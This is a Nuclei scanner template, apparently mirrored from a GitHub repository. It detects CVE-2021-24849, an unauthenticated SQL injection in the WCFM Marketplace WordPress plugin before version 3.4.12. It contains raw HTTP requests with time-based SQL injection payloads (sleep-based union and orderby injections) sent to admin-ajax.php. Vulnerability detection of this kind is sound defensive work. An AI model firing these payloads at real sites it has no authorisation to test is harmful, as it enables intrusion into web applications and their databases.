daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2021/CVE-2021-24849.yaml

69 lines
2.6 KiB
YAML
Raw Blame History

id: CVE-2021-24849
info:
name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection
author: ritikchaddha
severity: critical
description: |
The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
remediation: Fixed in 3.4.12
reference:
- https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24849
- https://wordpress.org/plugins/wc-multivendor-marketplace/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24849
cwe-id: CWE-89
epss-score: 0.02367
epss-percentile: 0.89583
cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: wclovers
product: "frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible"
framework: wordpress
publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"
tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce")
condition: and
internal: true
- raw:
- |
@timeout: 20s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{{post_data}}
payloads:
post_data:
- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--"
- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code == 200'
- 'contains(header, "application/json")'
- 'contains(body, "success")'
condition: and
# digest: 4a0a00473045022100ef54cd087054515b6ef2f1935d258ecea55b3abf384cd95798b8cd351a5f1fe90220070a59d1e5a3ab49e8fc248e2ddc238e33958d75f7b3cfc5700b5018b8116f82:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink